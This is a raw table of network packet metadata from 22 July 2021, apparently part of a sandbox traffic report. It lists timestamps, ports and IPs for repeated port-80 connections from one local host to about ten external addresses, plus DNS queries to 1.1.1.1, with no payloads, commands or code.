Jul 22, 2021 14:10:58.552949905 CEST	80	49189	2.20.214.243	192.168.11.11
Jul 22, 2021 14:10:58.555598021 CEST	49189	80	192.168.11.11	2.20.214.243
Jul 22, 2021 14:11:15.293371916 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:15.298456907 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:15.299012899 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:15.299109936 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:15.304352045 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:17.375323057 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:17.375405073 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:17.375469923 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:17.375530958 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:17.375792980 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:17.375873089 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:17.375906944 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:17.375936031 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:17.375983000 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:17.376028061 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:17.376080990 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:17.376153946 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:17.376168013 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:17.376207113 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:17.376382113 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:17.376399040 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:17.376409054 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:17.376543999 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:17.381437063 CEST	80	49194	66.235.200.145	192.168.11.11
Jul 22, 2021 14:11:17.381850004 CEST	49194	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:11:30.284502029 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:30.422667027 CEST	80	49195	204.11.56.48	192.168.11.11
Jul 22, 2021 14:11:30.423265934 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:30.423361063 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:30.608391047 CEST	80	49195	204.11.56.48	192.168.11.11
Jul 22, 2021 14:11:30.656169891 CEST	80	49195	204.11.56.48	192.168.11.11
Jul 22, 2021 14:11:30.656253099 CEST	80	49195	204.11.56.48	192.168.11.11
Jul 22, 2021 14:11:30.656313896 CEST	80	49195	204.11.56.48	192.168.11.11
Jul 22, 2021 14:11:30.657006979 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:30.657099009 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:30.657111883 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:30.688786983 CEST	80	49195	204.11.56.48	192.168.11.11
Jul 22, 2021 14:11:30.689474106 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:30.795268059 CEST	80	49195	204.11.56.48	192.168.11.11
Jul 22, 2021 14:11:30.795351028 CEST	80	49195	204.11.56.48	192.168.11.11
Jul 22, 2021 14:11:30.795411110 CEST	80	49195	204.11.56.48	192.168.11.11
Jul 22, 2021 14:11:30.795470953 CEST	80	49195	204.11.56.48	192.168.11.11
Jul 22, 2021 14:11:30.796097040 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:30.796190023 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:30.796202898 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:30.796214104 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:30.827285051 CEST	80	49195	204.11.56.48	192.168.11.11
Jul 22, 2021 14:11:30.827893972 CEST	49195	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:11:33.686296940 CEST	49196	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:11:33.702362061 CEST	80	49196	91.195.240.94	192.168.11.11
Jul 22, 2021 14:11:33.702868938 CEST	49196	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:11:33.702970982 CEST	49196	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:11:33.718943119 CEST	80	49196	91.195.240.94	192.168.11.11
Jul 22, 2021 14:11:33.743125916 CEST	80	49196	91.195.240.94	192.168.11.11
Jul 22, 2021 14:11:33.743195057 CEST	80	49196	91.195.240.94	192.168.11.11
Jul 22, 2021 14:11:33.743599892 CEST	49196	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:11:33.743691921 CEST	49196	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:11:33.743705988 CEST	49196	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:11:33.759742022 CEST	80	49196	91.195.240.94	192.168.11.11
Jul 22, 2021 14:11:36.773462057 CEST	49197	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:11:36.778734922 CEST	80	49197	75.2.26.18	192.168.11.11
Jul 22, 2021 14:11:36.779261112 CEST	49197	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:11:36.779356003 CEST	49197	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:11:36.784467936 CEST	80	49197	75.2.26.18	192.168.11.11
Jul 22, 2021 14:11:36.966597080 CEST	80	49197	75.2.26.18	192.168.11.11
Jul 22, 2021 14:11:36.966665983 CEST	80	49197	75.2.26.18	192.168.11.11
Jul 22, 2021 14:11:36.967164993 CEST	49197	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:11:36.967258930 CEST	49197	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:11:36.967272997 CEST	49197	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:11:36.972642899 CEST	80	49197	75.2.26.18	192.168.11.11
Jul 22, 2021 14:11:40.274944067 CEST	49198	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:11:40.458720922 CEST	80	49198	154.201.255.27	192.168.11.11
Jul 22, 2021 14:11:40.459285021 CEST	49198	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:11:40.459381104 CEST	49198	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:11:40.642520905 CEST	80	49198	154.201.255.27	192.168.11.11
Jul 22, 2021 14:11:40.646723032 CEST	80	49198	154.201.255.27	192.168.11.11
Jul 22, 2021 14:11:40.646785021 CEST	80	49198	154.201.255.27	192.168.11.11
Jul 22, 2021 14:11:40.647304058 CEST	49198	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:11:40.647393942 CEST	49198	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:11:40.647406101 CEST	49198	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:11:40.830738068 CEST	80	49198	154.201.255.27	192.168.11.11
Jul 22, 2021 14:11:43.844880104 CEST	49199	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:11:43.850501060 CEST	80	49199	34.102.136.180	192.168.11.11
Jul 22, 2021 14:11:43.851073027 CEST	49199	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:11:43.851167917 CEST	49199	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:11:43.856810093 CEST	80	49199	34.102.136.180	192.168.11.11
Jul 22, 2021 14:11:43.958415985 CEST	80	49199	34.102.136.180	192.168.11.11
Jul 22, 2021 14:11:43.958492994 CEST	80	49199	34.102.136.180	192.168.11.11
Jul 22, 2021 14:11:43.959062099 CEST	49199	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:11:43.959163904 CEST	49199	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:11:43.959180117 CEST	49199	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:11:44.189435959 CEST	49199	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:11:44.195197105 CEST	80	49199	34.102.136.180	192.168.11.11
Jul 22, 2021 14:11:47.013365030 CEST	49200	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:11:47.179030895 CEST	80	49200	63.250.34.223	192.168.11.11
Jul 22, 2021 14:11:47.179676056 CEST	49200	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:11:47.179769993 CEST	49200	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:11:47.345402956 CEST	80	49200	63.250.34.223	192.168.11.11
Jul 22, 2021 14:11:47.345761061 CEST	80	49200	63.250.34.223	192.168.11.11
Jul 22, 2021 14:11:47.345818043 CEST	80	49200	63.250.34.223	192.168.11.11
Jul 22, 2021 14:11:47.346440077 CEST	49200	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:11:47.346530914 CEST	49200	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:11:48.180789948 CEST	49200	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:11:48.346218109 CEST	80	49200	63.250.34.223	192.168.11.11
Jul 22, 2021 14:11:51.406045914 CEST	49201	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:11:51.512902975 CEST	80	49201	66.96.147.113	192.168.11.11
Jul 22, 2021 14:11:51.513411045 CEST	49201	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:11:51.513475895 CEST	49201	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:11:51.620378017 CEST	80	49201	66.96.147.113	192.168.11.11
Jul 22, 2021 14:11:51.652160883 CEST	80	49201	66.96.147.113	192.168.11.11
Jul 22, 2021 14:11:51.652226925 CEST	80	49201	66.96.147.113	192.168.11.11
Jul 22, 2021 14:11:51.652853966 CEST	49201	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:11:51.652951002 CEST	49201	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:11:51.652965069 CEST	49201	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:11:51.759937048 CEST	80	49201	66.96.147.113	192.168.11.11
Jul 22, 2021 14:11:57.658782005 CEST	49202	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:11:57.818952084 CEST	80	49202	184.168.131.241	192.168.11.11
Jul 22, 2021 14:11:57.819552898 CEST	49202	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:11:57.819648027 CEST	49202	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:11:57.979213953 CEST	80	49202	184.168.131.241	192.168.11.11
Jul 22, 2021 14:11:58.006247044 CEST	80	49202	184.168.131.241	192.168.11.11
Jul 22, 2021 14:11:58.006308079 CEST	80	49202	184.168.131.241	192.168.11.11
Jul 22, 2021 14:11:58.006866932 CEST	49202	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:11:58.006958008 CEST	49202	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:11:58.006969929 CEST	49202	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:11:58.166560888 CEST	80	49202	184.168.131.241	192.168.11.11
Jul 22, 2021 14:12:01.007863998 CEST	49203	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:12:01.138880968 CEST	80	49203	72.29.74.90	192.168.11.11
Jul 22, 2021 14:12:01.139470100 CEST	49203	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:12:01.139565945 CEST	49203	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:12:01.270778894 CEST	80	49203	72.29.74.90	192.168.11.11
Jul 22, 2021 14:12:02.259545088 CEST	80	49203	72.29.74.90	192.168.11.11
Jul 22, 2021 14:12:02.260200977 CEST	49203	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:12:02.260289907 CEST	49203	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:12:02.269056082 CEST	80	49203	72.29.74.90	192.168.11.11
Jul 22, 2021 14:12:02.269114017 CEST	80	49203	72.29.74.90	192.168.11.11
Jul 22, 2021 14:12:02.269607067 CEST	49203	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:12:02.269665003 CEST	49203	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:12:02.392110109 CEST	80	49203	72.29.74.90	192.168.11.11
Jul 22, 2021 14:12:02.392668962 CEST	49203	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:12:15.276514053 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:15.281511068 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:15.282084942 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:15.282162905 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:15.287163019 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:17.545545101 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:17.545689106 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:17.545751095 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:17.545813084 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:17.545921087 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:17.545983076 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:17.546042919 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:17.546084881 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:17.546128988 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:17.546456099 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:17.546570063 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:17.546582937 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:17.546592951 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:17.547324896 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:17.547414064 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:17.547425985 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:17.547435045 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:17.547444105 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:17.551680088 CEST	80	49204	66.235.200.145	192.168.11.11
Jul 22, 2021 14:12:17.552223921 CEST	49204	80	192.168.11.11	66.235.200.145
Jul 22, 2021 14:12:29.564197063 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:29.704056025 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.704749107 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:29.704839945 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:29.845175028 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.933096886 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.933242083 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.933305025 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.933365107 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.933423042 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.933480978 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.933538914 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.933598995 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.933656931 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.933716059 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:29.934040070 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:29.934103012 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:29.934115887 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:29.934127092 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:29.934135914 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:29.934145927 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:29.934155941 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:30.053317070 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:30.053992987 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:30.074254990 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:30.074337006 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:30.074400902 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:30.074461937 CEST	80	49205	204.11.56.48	192.168.11.11
Jul 22, 2021 14:12:30.074971914 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:30.075063944 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:30.075077057 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:30.075088024 CEST	49205	80	192.168.11.11	204.11.56.48
Jul 22, 2021 14:12:32.934417963 CEST	49206	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:12:32.950370073 CEST	80	49206	91.195.240.94	192.168.11.11
Jul 22, 2021 14:12:32.950989962 CEST	49206	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:12:32.953301907 CEST	49206	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:12:32.969307899 CEST	80	49206	91.195.240.94	192.168.11.11
Jul 22, 2021 14:12:32.989867926 CEST	80	49206	91.195.240.94	192.168.11.11
Jul 22, 2021 14:12:32.989960909 CEST	80	49206	91.195.240.94	192.168.11.11
Jul 22, 2021 14:12:32.990489960 CEST	49206	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:12:32.990586042 CEST	49206	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:12:32.990600109 CEST	49206	80	192.168.11.11	91.195.240.94
Jul 22, 2021 14:12:33.006577015 CEST	80	49206	91.195.240.94	192.168.11.11
Jul 22, 2021 14:12:35.991645098 CEST	49207	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:12:35.996417046 CEST	80	49207	75.2.26.18	192.168.11.11
Jul 22, 2021 14:12:35.996951103 CEST	49207	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:12:35.996997118 CEST	49207	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:12:36.001985073 CEST	80	49207	75.2.26.18	192.168.11.11
Jul 22, 2021 14:12:36.183383942 CEST	80	49207	75.2.26.18	192.168.11.11
Jul 22, 2021 14:12:36.183450937 CEST	80	49207	75.2.26.18	192.168.11.11
Jul 22, 2021 14:12:36.184005022 CEST	49207	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:12:36.184103012 CEST	49207	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:12:36.184118032 CEST	49207	80	192.168.11.11	75.2.26.18
Jul 22, 2021 14:12:36.189238071 CEST	80	49207	75.2.26.18	192.168.11.11
Jul 22, 2021 14:12:39.185236931 CEST	49208	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:12:39.367845058 CEST	80	49208	154.201.255.27	192.168.11.11
Jul 22, 2021 14:12:39.368479967 CEST	49208	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:12:39.368575096 CEST	49208	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:12:39.550384045 CEST	80	49208	154.201.255.27	192.168.11.11
Jul 22, 2021 14:12:39.554577112 CEST	80	49208	154.201.255.27	192.168.11.11
Jul 22, 2021 14:12:39.554605007 CEST	80	49208	154.201.255.27	192.168.11.11
Jul 22, 2021 14:12:39.555226088 CEST	49208	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:12:39.555269957 CEST	49208	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:12:39.555275917 CEST	49208	80	192.168.11.11	154.201.255.27
Jul 22, 2021 14:12:39.737519026 CEST	80	49208	154.201.255.27	192.168.11.11
Jul 22, 2021 14:12:42.557317019 CEST	49209	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:12:42.563601017 CEST	80	49209	34.102.136.180	192.168.11.11
Jul 22, 2021 14:12:42.564145088 CEST	49209	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:12:42.564234972 CEST	49209	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:12:42.570627928 CEST	80	49209	34.102.136.180	192.168.11.11
Jul 22, 2021 14:12:42.671833992 CEST	80	49209	34.102.136.180	192.168.11.11
Jul 22, 2021 14:12:42.671900034 CEST	80	49209	34.102.136.180	192.168.11.11
Jul 22, 2021 14:12:42.672755957 CEST	49209	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:12:42.672841072 CEST	49209	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:12:42.672853947 CEST	49209	80	192.168.11.11	34.102.136.180
Jul 22, 2021 14:12:42.679614067 CEST	80	49209	34.102.136.180	192.168.11.11
Jul 22, 2021 14:12:45.674406052 CEST	49210	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:12:45.840703011 CEST	80	49210	63.250.34.223	192.168.11.11
Jul 22, 2021 14:12:45.841290951 CEST	49210	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:12:45.841383934 CEST	49210	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:12:46.007241011 CEST	80	49210	63.250.34.223	192.168.11.11
Jul 22, 2021 14:12:46.008169889 CEST	80	49210	63.250.34.223	192.168.11.11
Jul 22, 2021 14:12:46.008238077 CEST	80	49210	63.250.34.223	192.168.11.11
Jul 22, 2021 14:12:46.008784056 CEST	49210	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:12:46.008877993 CEST	49210	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:12:46.843812943 CEST	49210	80	192.168.11.11	63.250.34.223
Jul 22, 2021 14:12:47.009129047 CEST	80	49210	63.250.34.223	192.168.11.11
Jul 22, 2021 14:12:49.844575882 CEST	49211	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:12:49.952107906 CEST	80	49211	66.96.147.113	192.168.11.11
Jul 22, 2021 14:12:49.952672005 CEST	49211	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:12:49.952766895 CEST	49211	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:12:50.059973955 CEST	80	49211	66.96.147.113	192.168.11.11
Jul 22, 2021 14:12:50.070712090 CEST	80	49211	66.96.147.113	192.168.11.11
Jul 22, 2021 14:12:50.070772886 CEST	80	49211	66.96.147.113	192.168.11.11
Jul 22, 2021 14:12:50.071322918 CEST	49211	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:12:50.071412086 CEST	49211	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:12:50.071424007 CEST	49211	80	192.168.11.11	66.96.147.113
Jul 22, 2021 14:12:50.178864002 CEST	80	49211	66.96.147.113	192.168.11.11
Jul 22, 2021 14:12:56.074398041 CEST	49212	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:12:56.238895893 CEST	80	49212	184.168.131.241	192.168.11.11
Jul 22, 2021 14:12:56.239464045 CEST	49212	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:12:56.239558935 CEST	49212	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:12:56.404305935 CEST	80	49212	184.168.131.241	192.168.11.11
Jul 22, 2021 14:12:56.459806919 CEST	80	49212	184.168.131.241	192.168.11.11
Jul 22, 2021 14:12:56.459873915 CEST	80	49212	184.168.131.241	192.168.11.11
Jul 22, 2021 14:12:56.460448027 CEST	49212	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:12:56.460542917 CEST	49212	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:12:56.460557938 CEST	49212	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:12:56.625135899 CEST	80	49212	184.168.131.241	192.168.11.11
Jul 22, 2021 14:12:59.461766958 CEST	49213	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:12:59.592576027 CEST	80	49213	72.29.74.90	192.168.11.11
Jul 22, 2021 14:12:59.593096018 CEST	49213	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:12:59.593116045 CEST	49213	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:12:59.723846912 CEST	80	49213	72.29.74.90	192.168.11.11
Jul 22, 2021 14:13:00.718346119 CEST	80	49213	72.29.74.90	192.168.11.11
Jul 22, 2021 14:13:00.718966007 CEST	49213	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:13:00.719065905 CEST	49213	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:13:00.728533983 CEST	80	49213	72.29.74.90	192.168.11.11
Jul 22, 2021 14:13:00.728595018 CEST	80	49213	72.29.74.90	192.168.11.11
Jul 22, 2021 14:13:00.729186058 CEST	49213	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:13:00.729283094 CEST	49213	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:13:00.850114107 CEST	80	49213	72.29.74.90	192.168.11.11
Jul 22, 2021 14:13:00.850584030 CEST	49213	80	192.168.11.11	72.29.74.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 14:10:41.605436087 CEST	60819	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:10:41.617368937 CEST	53	60819	1.1.1.1	192.168.11.11
Jul 22, 2021 14:10:44.382704973 CEST	62415	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:10:44.388441086 CEST	53	62415	1.1.1.1	192.168.11.11
Jul 22, 2021 14:10:44.623790026 CEST	60920	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:10:44.685115099 CEST	53	60920	1.1.1.1	192.168.11.11
Jul 22, 2021 14:10:45.624022007 CEST	58974	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:10:45.630251884 CEST	53	58974	1.1.1.1	192.168.11.11
Jul 22, 2021 14:10:48.061043978 CEST	51168	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:10:48.404114008 CEST	53	51168	1.1.1.1	192.168.11.11
Jul 22, 2021 14:10:52.676033020 CEST	64594	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:10:53.684685946 CEST	64594	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:10:55.771420956 CEST	64594	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:10:59.772691011 CEST	64594	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:01.013005972 CEST	53	64594	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:01.013067961 CEST	53	64594	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:01.013111115 CEST	53	64594	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:01.013149977 CEST	53	64594	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:02.683186054 CEST	50637	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:02.689013004 CEST	53	50637	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:10.790605068 CEST	50044	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:10.829807043 CEST	53	50044	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:14.798547029 CEST	62888	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:15.292206049 CEST	53	62888	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:20.377034903 CEST	54497	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:20.448738098 CEST	53	54497	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:23.455034971 CEST	51228	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:23.470365047 CEST	53	51228	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:26.473890066 CEST	51052	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:26.498881102 CEST	53	51052	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:29.500731945 CEST	58463	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:30.283643007 CEST	53	58463	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:33.658087015 CEST	55647	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:33.685342073 CEST	53	55647	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:36.123415947 CEST	58157	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:36.128983974 CEST	53	58157	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:36.744282007 CEST	50336	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:36.771619081 CEST	53	50336	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:39.969048977 CEST	63941	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:40.273828983 CEST	53	63941	1.1.1.1	192.168.11.11
Jul 22, 2021 14:11:43.652374029 CEST	58810	53	192.168.11.11	1.1.1.1
Jul 22, 2021 14:11:43.843647003 CEST	53	58810	1.1.1.1	192.168.11.11
